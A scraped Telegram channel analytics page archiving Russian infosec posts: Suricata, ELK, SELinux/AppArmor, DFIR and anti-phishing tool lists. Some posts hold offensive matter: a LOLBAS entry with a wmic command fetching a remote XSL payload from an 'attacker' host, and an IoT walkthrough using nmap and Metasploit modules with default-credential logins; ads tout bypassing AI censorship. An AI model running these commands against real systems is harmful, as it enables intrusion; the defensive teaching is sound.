ar
Feedback
CodeGuard: PySec Edition

CodeGuard: PySec Edition

قناة بسيطة

Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy

إظهار المزيد

📈 نظرة تحليلية على قناة تيليجرام CodeGuard: PySec Edition

تُعد قناة CodeGuard: PySec Edition لاعباً نشطاً. يضم المجتمع حالياً 14 173 مشتركاً، محتلاً المرتبة 8 752 في فئة التكنولوجيات والتطبيقات والمرتبة 45 689 في منطقة روسيا.

📊 مؤشرات الجمهور والحراك

منذ تأسيسه في невідомо، حقق المشروع نمواً سريعاً وجمع 14 173 مشتركاً.

بحسب آخر البيانات بتاريخ 28 سبتمبر, 2026، تحافظ القناة على نشاط مستقر. خلال آخر 30 يوماً تغيّر عدد الأعضاء بمقدار 820، وفي آخر 24 ساعة بمقدار 28، مع بقاء الوصول العام مرتفعاً.

  • حالة التحقق: غير موثّقة
  • معدل التفاعل (ER): يبلغ متوسط تفاعل الجمهور 9.75‎%. وخلال أول 24 ساعة من النشر يحصد المحتوى عادةً 5.54‎% من ردود الفعل نسبةً إلى إجمالي المشتركين.
  • وصول المنشورات: يحصل كل منشور على متوسط 1 377 مشاهدة. وخلال اليوم الأول يجمع عادةً 782 مشاهدة.
  • التفاعلات والاستجابة: يتفاعل الجمهور بانتظام؛ متوسط التفاعلات لكل منشور يبلغ 7.
  • الاهتمامات الموضوعية: يركز المحتوى على مواضيع رئيسية مثل codeguard, pysec, docker, grep, контейнер.

📝 الوصف وسياسة المحتوى

يصف المؤلف القناة بأنها مساحة للتعبير عن الآراء الذاتية:
“Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”

بفضل وتيرة التحديث المرتفعة (أحدث البيانات بتاريخ 29 سبتمبر, 2026) تحافظ القناة على حداثتها ومستوى وصول مرتفع. وتُظهر التحليلات تفاعلاً نشطاً من الجمهور، ما يجعلها نقطة تأثير مهمة ضمن فئة التكنولوجيات والتطبيقات.

14 173
المشتركون
+2824 ساعات
+1467 أيام
+82030 أيام
أرشيف المشاركات
♟ На форуме XSS создали самую лучшую и объёмную статью по Nmap, которая описывает его неочевидные функции и возможности ⚠️ Ав
♟ На форуме XSS создали самую лучшую и объёмную статью по Nmap, которая описывает его неочевидные функции и возможности ⚠️ Автор последовательно проходит по реальным кейсам использования Nmap:
🎥 Как Nmap взаимодействует с IDS/IPS и как настраивать скан так, чтобы либо не палиться, либо наоборот использовать систему обнаружения вторжений в свою пользу 🎥 Как работать со службами и белыми списками: определение сервисов за портами, обход ограничений и грамотная фильтрация при массовом скане 🎥 Выявление хостов в сети, включая техники, которые помогают находить машины даже в задушенных сегментах с фильтрацией ICMP 🎥 Скрытые варианты сканирования портов, полезные при обходе простых фильтров и логирования
👌 Отдельные большие разделы посвящены:
🎥 Интеграции Nmap с Metasploit: о том, как быстро превращать результаты сканирования в список потенциальных целей и модулей для эксплуатации 🎥 Настройке тайминга и производительности, чтобы балансировать между stealth и скоростью при сканировании крупных подсетей 🎥 Определению операционных систем, сетевых стеков и особенностей хостов по отпечаткам, а также анализу VPN и виртуальных окружений
🖤 Не забыли и про обвязку Nmap:
🎥 Как использовать Zenmap в качестве инструмента для визуализации и автоматизации типовых профилей сканирования, когда нужно повторять одни и те же сценарии 🎥 Использование API Nmap при написании собственных утилит и обёрток 🎥 Глубокий разбор Nmap Scripting Engine: как расширять функционал сканера скриптами, писать свои проверки и автоматизировать рутинные тесты безопасности
➡️ Статью, как всегда, можно изучить в нашем архиве 😈 CodeGuard: PySec Edition | Чат

🔥 Секрет успеха CodeGuard — полезные по ИБ. Если нравиться контент? 👇 https://t.me/boost?c=2675453029 1 буст = 3 ресурса по
🔥 Секрет успеха CodeGuard — полезные по ИБ. Если нравиться контент? 👇 https://t.me/boost?c=2675453029 1 буст = 3 ресурса по инфобезу, честно-честно..)) 😈 CodeGuard: PySec Edition | Чат

🤩 Практические примеры настройки и работы с системами предотвращения вторжений (IPS) 1️⃣ Установка Suricata и запуск в IDS‑р
🤩 Практические примеры настройки и работы с системами предотвращения вторжений (IPS) 1️⃣ Установка Suricata и запуск в IDS‑режиме
sudo apt update && sudo apt install -y suricata
sudo suricata -c /etc/suricata/suricata.yaml -i eth0 -v
— Данные команды ставят Suricata из репозитория и запускают её как обычный IDS. Такой режим удобен для первичной обкатки правил, чтобы не стрелять себе в ногу на боевой сети 2️⃣ Включение IPS
# /etc/suricata/suricata.yaml – фрагмент
af-packet:
  - interface: eth0
    cluster-type: cluster_flow
    cluster-id: 99
    defrag: yes
    copy-mode: ips
    copy-iface: eth1
    buffer-size: 64535
    use-mmap: yes
— Данный фрагмент переводит Suricata в inline‑режим через AF_PACKET: трафик фактически прокачивается через Suricata, и движок может дропать пакеты по правилам 3️⃣ Правило для блокировки вредоносного трафика
local.rules
drop tcp any any -> any 80 (msg:"BLOCK suspicious HTTP user-agent"; \
 content:"BadBot"; http_header; sid:100001; rev:1;)
— Одно из простейших правил IPS: если в HTTP‑заголовке User-Agent встречается строка BadBot, пакет дропается, а событие уходит в лог. В реальной жизни сюда добавляют сигнатуры C2, эксплойтов, сканеров и регэкспы по URI/Host 🐳 В итоге: при аккуратной настройке IPS перестаёт быть кирпичом для сети и превращается в реально полезный фильтр, который режет эксплуатацию известных уязвимостей, сканирование и типовой шум ещё на границе периметра 😈 CodeGuard: PySec Edition | Чат

🗺 Огромная коллекция интерактивных Roadmap'ов по всем направлениям IT Репозиторий developer-roadmap, в котором собраны тонны
🗺 Огромная коллекция интерактивных Roadmap'ов по всем направлениям IT Репозиторий developer-roadmap, в котором собраны тонны дорожных карт, гайдов и материалов, которые помогут тебе выстроить обучение, понять что учить и как двигаться дальше.
➡️ Все маршруты кликабельны: можно переходить по шагам и изучать темы глубже ➡️ Регулярные обновления под актуальные тренды и требования рынка ➡️ Есть функции для отслеживания своего прогресса — чтобы видеть, где ты и куда двигаться
Подойдет всем — от новичков до опытных специалистов, которым нужно систематизировать знания или быстро войти в новую область. 🔋 Ссылка для старта 😈 CodeGuard | Чат

😄 Практические знания, которые работают на реальных проектах Хватит теории без применения. Мы собрали проверенные материалы для IT-специалистов: ⭐ Алгоритмы и оптимизация 🔹 Решение задач 🔹 Эффективный код 🔹 Big O на практике ⭐ Архитектура систем 🔹 Сервер с нуля 🔹 Базы данных 🔹 Понимания Ядра Linux ⭐ Инженерное мышление 🔹 Практика и задачи 🔹 Программирование и разработка 🔹 GitLab, DevOps, CI/CD Готовые шаблоны и чек-листы для твоих проектов. ➡️ Сохраняй в закладки

🧠 Ghidra Reversing Tutorials — плейлист роликов для входа в реверс без боли Ghidra — бесплатный инструмент для reverse engin
🧠 Ghidra Reversing Tutorials — плейлист роликов для входа в реверс без боли
Ghidra — бесплатный инструмент для reverse engineering от NSA для декомпиляции, анализа бинарей, работы с разными архитектурами и наличием удобного GUI. Но сам по себе такой комбайн легко отпугивает, без хорошего гида можно залипнуть в интерфейсе и так и не дойти до практики
🤩 Сборник роликов Ghidra Reversing Tutorials как раз решает эту проблему — это серия роликов, где автор пошагово проводит через реальную работу реверсера от первого запуска до анализа сложных участков кода 👩‍💻 Что даёт плейлист: • Понимание базового интерфейса Ghidra • Практику по декомпиляции и сопоставлению ассемблера с высоким уровнем, чтобы начать видеть бизнес‑логику в бинаре • Разбор типичных задач ИБ: работа со строками, проверками, модификацию поведения инструмента • Демонстрацию рабочих приёмов, которые реально используют в malware‑анализе и разборе закрытых приложений ⛓ Ссылка на плейлист: [тык] 😈 CodeGuard | Чат

🪖 Подборка сервисов и фреймворков для anti‑phishing — Фишинг остаётся одним из главных векторов атак, поэтому нужен не один
🪖 Подборка сервисов и фреймворков для anti‑phishing — Фишинг остаётся одним из главных векторов атак, поэтому нужен не один волшебный продукт, а стек из инструментов: проверка ссылок и доменов, фильтрация почты, симуляция атак и т.д.
1. Gophish — популярнейший open source фреймворк для эмуляции рассылок, сбора метрик и обучения 2. PhishTank — бесплатная народная база фишинговых сайтов с API, хороший дополнительный источник IOC для быстрой проверки ссылок и интеграции в собственные скрипты и прокси 3. OpenPhish — коммерческий фид URL/домёнов, замеченных в фишинговых кампаниях. Часто используется как источник данных для SIEM, почтовых шлюзов и NGFW 4. VirusTotal — стандарт проверки подозрительных файлов и ссылок, даёт пересечение по десяткам движков и репутационных движков, удобен для ручного и автоматизированного анализа 5. urlscan.io — глубокий разбор URL: скриншоты, DOM, сетевые запросы, редиректы и маппинг на связанные домены; полезен для разборов сложных фишинговых страниц и brand‑impersonation 6. Google Safe Browsing API — проверка ссылок по базе Google; логично использовать как ещё один слой проверки URL в прокси, боте или веб‑приложении 7. Barracuda Email Protection — комплексная защита почты с сильным уклоном в антифишинг и защиту доменной репутации 8. KnowBe4 — один из самых известных сервисов user awareness: фишинговые симуляции, обучение, метрики кликабельности и снижение риска за счёт практики 9. King Phisher — более продвинутый фреймворк для сложных фишинг‑кампаний c шаблонами, трекингом действий пользователей и гибкой кастомизацией. 10. URLhaus / Spamhaus — фиды вредоносных и фишинговых URL или домёнов, которые удобно использовать как источник IOC для почтовых шлюзов, SIEM и систем хантинга
Дальше можно наращивать глубину: добавлять интеграции с SIEM, SOAR, прокси и писать хантинг‑запросы поверх фидов и логов 🖱 😈 Codeguard | Чат

💀 Настройка и анализ журналов безопасности с помощью Elastic Stack (ELK) — В любой современной системе инфобеза журналы явля
💀 Настройка и анализ журналов безопасности с помощью Elastic Stack (ELK) — В любой современной системе инфобеза журналы являются чуть ли не основными источниками событий. ELK‑стек (Elasticsearch + Logstash + Kibana) позволяет собирать и анализировать огромный поток логов в реальном времени, что критично для обнаружения атак и расследований 🗒 Быстрая стартовая цепочка ELK: 1️⃣ Установка и настройка Filebeat (отправляет журналы с сервера)
sudo apt install filebeat
sudo nano /etc/filebeat/filebeat.yml
filebeat.inputs:
  - type: log
    paths:
      - /var/log/auth.log
      - /var/log/syslog
(Эта настройка берёт базовые Linux‑логи и отправляет их по сети на Logstash для дальнейшего анализа) 2️⃣ Настройка Logstash: фильтруем и парсим события для поиска ключевых деталей
input { beats { port => 5044 } }
filter {
  grok { match => { "message" => "%{SYSLOGTIMESTAMP:timestamp} %{HOSTNAME:host} %{DATA:program} %{GREEDYDATA:msg}" } }
  date { match => [ "timestamp", "MMM  d HH:mm:ss", "MMM dd HH:mm:ss" ] }
}
output { elasticsearch { hosts => ["localhost:9200"] index => "security-logs-%{+YYYY.MM.dd}" } }
(Конфиг Logstash разбирает системные логи: вытаскивает дату, хост, программу, сообщение, чтобы в итоге события лежали в индексах с датой) 3️⃣ В Kibana быстро настраиваем дашборды: — Выбираем нужный индекс “security-logs-*” — Затем задаём фильтры (user, event.type, IP) — Строим графики и ищем всплески активности. Вот и все 👾 👀 Практические лайфхаки: Грок‑фильтры вытаскивают важные поля, визуализации показывают динамику событий, а деление по датам индекс ускоряет расследование и поиск аномалий 📚 Материалы для прокачки: *Официальная документация Filebeat* *Руководство по Grok парсингу* Пишите в чат, на какую тему вы бы хотели получить интересный гайд 👽 😈 CodeGuard | Чат

Айтишник, присаживайся поудобнее: собрали для тебя подборку лучших каналов про ИИ, разработки и языки кода. • Only GPT — твой
Айтишник, присаживайся поудобнее: собрали для тебя подборку лучших каналов про ИИ, разработки и языки кода. • Only GPT — твой гид по нейронкам, секретным функциям GPT 5.1 и способам обхода внутренней цензуры. • Only Hack — канал профессионального хакера про приватность и безопасность. • Only Apple — инсайды о новых девайсах Apple и утечки от разработчиков компании. • Only Python — ТОП-1 бесплатные материалы по питону в Интернете. • Only IT — прорывные стартапы, которые задают тренды в индустрии. • Only GitHub — всякие полезности (и бесполезности) с Гитхаба. • Only Tech — все самые свежие и актуальные технологии. • Ну и мемасики про IT конечно Сохраняй в подписках!

😈 Как в Wireshark расшифровать Wi-Fi трафик Начнём с главного — расшифровка Wi-Fi трафика не так проста, как кажется. Просто иметь пароль точки доступа недостаточно. Чтобы расшифровать трафик, нужны: 🔵 Рукопожатие, то самое четырёхэтапное (4-way handshake) между клиентом и точкой доступа, которое происходит перед передачей интересующих данных 🔵 Пароль от сети (ключ для подключения к точке доступа) Без рукопожатия расшифровать перехваченный трафик нельзя, даже если у вас есть пароль.
В Wireshark нужно: 1) Захватить трафик вместе с рукопожатием (например, через Airodump-ng или сам Wireshark в режиме мониторинга) 2) В настройках Wireshark добавить ключ для расшифровки в формате wpa-pwd парол:SSID 3) Включить поддержку IEEE 802.11 в параметрах протокола
После этого трафик станет доступен для анализа — увидите DNS, HTTP запросы и другие полезные пакеты. 🤒 Подробнее руководство тут 😈 CodeGuard | Чат

✨ SELinux и AppArmor: настройка, практические правила и секреты безопасности «•» При необходимости жёсткой изоляции процессов
✨ SELinux и AppArmor: настройка, практические правила и секреты безопасности
«•» При необходимости жёсткой изоляции процессов на хосте на сцену выходят два главных инструмента Mandatory Access Control: SELinux и AppArmor. Оба: маст‑хэв для серверов, рабочих станций, облака. Но чем же они отличаются и как научится их настраивать без боли?
⚠️ SELinux — внедряет контроль на базе меток и в итоге каждая программа, файл и пользователь получает "security context"
/usr/sbin/setenforce 0 # Включаем в режиме permissive
sestatus # Проверяем статус
sudo setenforce 1 # Изменяем режим на enforcing
sudo nano /etc/selinux/config # Делаем его постоянным 
# Меняем SELINUX=permissive на SELINUX=enforcing
❓ PS: "Permissive" — диагностический режим: фиксирует нарушения, не блокирует. "Enforcing" — реально запрещает всё вне правил 🖥️ AppArmor — действует через профили по путям, проще для понимания и администрирования
sudo aa-status # Проверяем статус AppArmor
sudo ln -s /etc/apparmor.d/usr.sbin.nginx /etc/apparmor.d/enable # Включаем профиль для nginx
sudo systemctl reload apparmor # Вносим изменения в профиль
sudo nano /etc/apparmor.d/usr.sbin.nginx
sudo apparmor_parser -r /etc/apparmor.d/usr.sbin.nginx
🤨 Что выбрать? — Выбирайте SELinux, если вам важна высшая гибкость, тонкая настройка политик, хорошая защита от privilege escalation, а также если вы работаете с серверами с жесткими требованиями — Выбирайте AppArmor, если вы новичок, он быстрее оформляется и интегрируется, его легко писать и дебажить профили 🔗Полезные статьи на эту тему: • Core Differences Between SELinux and AppArmor • AppArmor vs SELinux 😈 CodeGuard | Чат

😀 LOLBAS — это каталог легитимных бинарников, скриптов и библиотек Windows, которые могут быть использованы в атаках без отд
😀 LOLBAS — это каталог легитимных бинарников, скриптов и библиотек Windows, которые могут быть использованы в атаках без отдельного вируса — Проект помогает и red team, и blue team: одним - находить реальные векторы, другим - строить детекты и ограничения 👾 Как устроен LOLBAS и что в нём лежит: — В репозитории хранятся YML-описания для каждого бинарника: имя, путь, подозрительные команды, MITRE ATT&CK и т.д. Это удобно парсить и загружать в SIEM/EDR. Упрощённый пример структуры записи:
Name: WMIC
Category: Binaries
FullPath:
  - Path: C:\Windows\System32\wbem\wmic.exe
Commands:
  - Command: wmic.exe process get brief /format:"http://attacker/payload.xsl"
    Description: Execute script from remote XSL
MitreID:
  - T1218.011
⚽️ Один из типичных кейсов — использование wmic.exe для выполнения кода через XSL-шаблон, хостящийся удалённо:
wmic.exe process get brief /format:"http://attacker/payload.xsl"
• wmic.exe — подписанный Microsoft бинарник • через /format подсовывается XSL с внедрённым скриптом • в итоге код выполняется руками доверенного системного инструмента, что сильно осложняет детект 🛡 Зачем опытному спецу смотреть на LOLBAS? — Генерация правил по конкретным бинарникам и аргументам, привязка к ATT&CK — Ограничение ненужных LOLBins через AppLocker/WDAC/EDR, whitelisting/blacklisting. — Приоритизация подозрительных процессов и команд, основанная на живой базе LOtL‑артефактов 📱 Ссылка на проект: [тык] 😈 CodeGuard | Чат

ИБ | Кибербезопасность | Разработка 🔥 Здесь основные IT направления, не упусти 🥶 Hacking - t.me/indigo_hack 👊 Linux & Bash - t.me/linux_bash 👩‍💻 Python - t.me/indigo_python 👩‍💻 Web - t.me/indigo_web
База знаний - Здесь (открыто) 🔥
Искал медь, а нашел золото - вступай ⚡️

🤒 Безопасность IoT-устройств с Kali Linux Metasploit IoT-устройства повсюду — от умных камер и роутеров до «умных» лампочек.
🤒 Безопасность IoT-устройств с Kali Linux Metasploit IoT-устройства повсюду — от умных камер и роутеров до «умных» лампочек. Но часто безопасность там оставляет желать лучшего. Я решил проверить, насколько они уязвимы, используя Kali Linux и Metasploit. 🔍 Сканируем сеть и находим устройства В Kali запускаю сканирование сети:
nmap -sP 192.168.1.0/24
Так я получаю список активных устройств и их IP-адресов. 🤒 Определяем уязвимые сервисы на IoT Для каждого IP проверяю открытые порты и сервисы:
nmap -sV -p 22,80,161,443,5555 <IP_устройства>
Обращаю внимание на telnet, ssh, веб-интерфейсы, SNMP. 🚀 Используем Metasploit для теста уязвимостей
msfconsole
И подгружаю модули для известных уязвимостей IoT, например:
use exploit/linux/http/hikvision_rtsp_auth_bypass
set RHOST <IP_устройства>
run
Или модуль для telnet с дефолтными паролями:
use scanner/telnet/telnet_login
set RHOSTS <IP_устройства>
set USERNAME root
set PASSWORD admin
run
⚠️ Во многих случаях IoT-устройства идут с дефолтными или слабыми паролями — это самая частая «дырка». 😈 CodeGuard | Чат

✨ SELinux и AppArmor: настройка, практические правила и секреты безопасности «•» При необходимости жёсткой изоляции процессов
✨ SELinux и AppArmor: настройка, практические правила и секреты безопасности
«•» При необходимости жёсткой изоляции процессов на хосте на сцену выходят два главных инструмента Mandatory Access Control: SELinux и AppArmor. Оба: маст‑хэв для серверов, рабочих станций, облака. Но чем же они отличаются и как научится их настраивать без боли?
⚠️ SELinux — внедряет контроль на базе меток и в итоге каждая программа, файл и пользователь получает "security context"
/usr/sbin/setenforce 0 # Включаем в режиме permissive
sestatus # Проверяем статус
sudo setenforce 1 # Изменяем режим на enforcing
sudo nano /etc/selinux/config # Делаем его постоянным 
# Меняем SELINUX=permissive на SELINUX=enforcing
❓ PS: "Permissive" — диагностический режим: фиксирует нарушения, не блокирует. "Enforcing" — реально запрещает всё вне правил 🖥️ AppArmor — действует через профили по путям, проще для понимания и администрирования
sudo aa-status # Проверяем статус AppArmor
sudo ln -s /etc/apparmor.d/usr.sbin.nginx /etc/apparmor.d/enable # Включаем профиль для nginx
sudo systemctl reload apparmor # Вносим изменения в профиль
sudo nano /etc/apparmor.d/usr.sbin.nginx
sudo apparmor_parser -r /etc/apparmor.d/usr.sbin.nginx
🤨 Что выбрать? — Выбирайте SELinux, если вам важна высшая гибкость, тонкая настройка политик, хорошая защита от privilege escalation, а также если вы работаете с серверами с жесткими требованиями — Выбирайте AppArmor, если вы новичок, он быстрее оформляется и интегрируется, его легко писать и дебажить профили 🔗Полезные статьи на эту тему: • Core Differences Between SELinux and AppArmor • AppArmor vs SELinux 😈 CodeGuard | Чат

😍 Анализ и фильтрация DNS-трафика для защиты от подмены и MITM-атак — DNS в последнее время стал одним из главных векторов а
😍 Анализ и фильтрация DNS-трафика для защиты от подмены и MITM-атак — DNS в последнее время стал одним из главных векторов атаки: злоумышленники подменяют ответы на запросы, направляют на фишинговые сайты или используют Man-in-the-Middle для перехвата данных Разберем как можно избежать этого: 🔍 Критичные методы анализа
• Логирование и мониторинг DNS-запросов — выявляйте массовые и подозрительные обращения к неизвестным доменам • Внедрение DNSSEC — подписи записей позволяют обнаруживать подделку данных в цепочке разрешения имён • Проверяйте повторяющиеся запросы к IP или доменам, не характерных для типичного юзера
👩‍💻 Фильтрация на практике
• Используйте локальный DNS-фильтр, такие как Pi-hole или AdGuard DNS — они позволяют блокировать вредоносные или нежелательные домены до их разрешения • Глубокий анализ трафика (DPI) на шлюзе — блокируйте подозрительные paкеты и туннели, например, через Suricata • Собирайте списки доверенных DNS-серверов и жёстко ограничивайте доступ к сторонним и публичным серверам
⚠️ Противодействие MITM
• Переходите на DNS-over-HTTPS (DoH) или DNS-over-TLS (DoT) — трафик шифруется, MITM с простым перехватом невозможен • Контролируйте поведение TLS — жёсткая проверка сертификатов и политик безопасности на клиенте. • Используйте инструменты тестирования MITM (например, mitmproxy) — для проверки устойчивости своей инфраструктуры
🗒 Выводы и рекомендации: без автоматического анализа и фильтрации DNS-трафика вы не узнаете о большинстве атак до полного компрометации, также старайтесь чаще внедрять современные методы: DNSSEC, DoH, DPI и локальные фильтры ➡️ Статья для подробного изучения 😈 CodeGuard | Чат

⚠️ Подборка DFIR: инструменты для цифровой форензики и расследования инцидентов — Подборка тулзов, которые пригодятся для раз
⚠️ Подборка DFIR: инструменты для цифровой форензики и расследования инцидентов — Подборка тулзов, которые пригодятся для разборов взломов, анализа образов дисков, дампов памяти и артефактов на хостах/SOC‑стороне:
1) Autopsy — GUI‑надстройка над Sleuth Kit для анализа дисков и файловых систем 2) Sleuth Kit — консольный набор утилит для файловой форензики и восстановления артефактов 3) Volatility — классика memory forensics: процессы, модули, сети, хэндлы из дампа ОЗУ 4) Rekall — альтернатива Volatility для анализа памяти, есть собственные драйверы для дампа 5) Redline — форензика памяти и файловой системы Windows от FireEye, удобно для триажа хостов 6) MemProcFS — монтирует дамп памяти как виртуальную FS, чтобы гулять по нему как по диску 7) FTK Imager — создание и просмотр образов дисков, извлечение файлов и артефактов 8) DFIR ORC — сбор артефактов с Windows‑хостов для дальнейшего анализа 9) EZ Tools — мощный набор для анализа логов, артефактов Windows, временных меток 10) Velociraptor — агент‑ориентированный live response и сбор артефактов с множества хостов 11) Cold Disk Quick Response — ускоренный анализ cold‑образов дисков с фокусом на инциденты 12) TheHive — платформа для управления расследованиями и кейсами 13) Cortex — движок для запуска анализов и обогащения артефактов (hash, IP, URL) прямо из TheHive 14) Intezer Analyze — анализ бинарников и процессов по генетике кода, поиск семейств малвари 15) Wireshark — разбор PCAP, восстановление сессий и сетевых артефактов в рамках расследования 16) NetworkMiner — пассивная форензика сети: извлечение файлов, сессий, учёток из PCAP 17) CyberChef — швейцарский нож для декодинга, парсинга, работы со строками, хешами и артефактами 18) KAPE — быстрый сбор форензик‑артефактов с дисков/хостов по заранее заданным таргетам 19) dfir.training — каталог курсов, тулов и практики по DFIR, если нужно копать глубже 20) GRR Rapid Response — фреймворк для удалённого IR и форензики в распределённых инфраструктурах
Делитесь в чате о каких инструментах сделать подробный пост 🎧 😈 CodeGuard | Чат

Удаляйте ChatGPT. Вы не умеете им пользоваться. Большинство пользователей спамит в ИИ всякую чушь — просят рассказать анекдот
Удаляйте ChatGPT. Вы не умеете им пользоваться. Большинство пользователей спамит в ИИ всякую чушь — просят рассказать анекдот, изливают душу и используют как Гугл. Российский тимлид OpenAI Вадим Петрич рассказывает в «Доктор GPT» как извлекать из нейронок максимум пользы. Это очень интересно: • ТОП №1 нейросеть, генерирующая видео без цензуры вообще • Готовые промты на все случаи жизни • Инсайды и разработки от китов индустрии Подпишитесь, с Доктором GPT нейронки станут инструментом роста, а не безделушкой: https://t.me/+wWliPygRN4g0ZTgy

⚠️ Подборка DFIR: инструменты для цифровой форензики и расследования инцидентов — Подборка тулзов, которые пригодятся для раз
⚠️ Подборка DFIR: инструменты для цифровой форензики и расследования инцидентов — Подборка тулзов, которые пригодятся для разборов взломов, анализа образов дисков, дампов памяти и артефактов на хостах/SOC‑стороне:
1) Autopsy — GUI‑надстройка над Sleuth Kit для анализа дисков и файловых систем 2) Sleuth Kit — консольный набор утилит для файловой форензики и восстановления артефактов 3) Volatility — классика memory forensics: процессы, модули, сети, хэндлы из дампа ОЗУ 4) Rekall — альтернатива Volatility для анализа памяти, есть собственные драйверы для дампа 5) Redline — форензика памяти и файловой системы Windows от FireEye, удобно для триажа хостов 6) MemProcFS — монтирует дамп памяти как виртуальную FS, чтобы гулять по нему как по диску 7) FTK Imager — создание и просмотр образов дисков, извлечение файлов и артефактов 8) DFIR ORC — сбор артефактов с Windows‑хостов для дальнейшего анализа 9) EZ Tools — мощный набор для анализа логов, артефактов Windows, временных меток 10) Velociraptor — агент‑ориентированный live response и сбор артефактов с множества хостов 11) Cold Disk Quick Response — ускоренный анализ cold‑образов дисков с фокусом на инциденты 12) TheHive — платформа для управления расследованиями и кейсами 13) Cortex — движок для запуска анализов и обогащения артефактов (hash, IP, URL) прямо из TheHive 14) Intezer Analyze — анализ бинарников и процессов по генетике кода, поиск семейств малвари 15) Wireshark — разбор PCAP, восстановление сессий и сетевых артефактов в рамках расследования 16) NetworkMiner — пассивная форензика сети: извлечение файлов, сессий, учёток из PCAP 17) CyberChef — швейцарский нож для декодинга, парсинга, работы со строками, хешами и артефактами 18) KAPE — быстрый сбор форензик‑артефактов с дисков/хостов по заранее заданным таргетам 19) dfir.training — каталог курсов, тулов и практики по DFIR, если нужно копать глубже 20) GRR Rapid Response — фреймворк для удалённого IR и форензики в распределённых инфраструктурах
Делитесь в чате о каких инструментах сделать подробный пост 🎧 😈 CodeGuard | Чат